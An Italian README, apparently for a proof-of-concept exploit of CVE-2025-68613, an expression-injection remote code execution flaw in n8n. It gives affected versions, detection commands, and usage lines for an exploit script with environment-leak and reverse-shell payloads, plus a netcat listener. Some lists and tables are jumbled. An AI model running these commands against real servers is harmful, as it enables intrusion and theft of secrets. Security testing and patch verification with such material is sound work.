
CVE-2025-68613

Gravità: 🔴 Critica Impatto: Esecuzione di codice remoto (Remote Code Execution) Piattaforma interessata: n8n (automazione dei flussi di lavoro)
CVE-2025-68613 è una vulnerabilità di sicurezza critica in n8n, una piattaforma open-source di automazione dei flussi di lavoro. Il problema consente a un attaccante autenticato di eseguire codice arbitrario sul server abusando del modo in cui vengono valutate le espressioni dei flussi di lavoro.
💥 Perché è pericoloso: Le espressioni dannose vengono valutate in un contesto non adeguatamente isolato (sandbox), consentendo l'accesso al runtime sottostante.

Se sfruttata, un attaccante potrebbe:
L'attacco viene eseguito con gli stessi privilegi del servizio n8n, amplificandone l'impatto.
| Metrica | Valore |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| Riservatezza | Alta |
| Integrità | Alta |
| Disponibilità |
➡️ È richiesta l'autenticazione, ma non è necessario alcun accesso amministrativo.
🚫 Vulnerabili:
0.211.0 → 1.120.31.121.0✅ Corrette:
1.120.41.121.11.122.0 e successive(Non rimuove completamente la vulnerabilità)
CVE-2025-68613.py — Controllo remoto di versione ed esposizione (sicuro)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
Oppure, se vuoi analizzare un elenco di host, esegui:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
Output di esempio
Esempi di utilizzo:
Perdita di variabili d'ambiente:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
Ottieni informazioni utente:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
Reverse shell (avvia prima il listener: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
Questo script è destinato esclusivamente a test di sicurezza autorizzati su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test.
🔒 Questo script è un exploit Proof-of-Concept (PoC) per CVE-2025-68613 in n8n.
📚 È fornito esclusivamente a scopo educativo e solo per test di sicurezza autorizzati.
🛡️ Usalo esclusivamente su sistemi che possiedi, controlli o per cui hai esplicita autorizzazione scritta al test.
🚫 L'uso non autorizzato contro qualsiasi sistema è illegale e potrebbe violare leggi (ad es. leggi su frode informatica e abuso di sistemi informatici).
❌ L'autore e le parti associate non si assumono alcuna responsabilità per usi impropri, danni o conseguenze legali.
✅ Usa responsabilmente, eticamente e nel pieno rispetto di tutte le leggi e normative applicabili.
🔐 Se effettui penetration test, assicurati di avere la dovuta autorizzazione (ad es. Rules of Engagement) in atto.
🛠️ I ricercatori di sicurezza possono usarlo per verificare le vulnerabilità e incoraggiare l'applicazione tempestiva delle patch.
| Alta |
| Categoria | Informazioni |
|---|
| CVE ID | CVE-2025-68613 |
| Prodotto | n8n |
| Classe di bug | Expression Injection |
| Risultato | Remote Code Execution |
| Accesso richiesto | Utente autenticato |
| Correzione disponibile | Sì |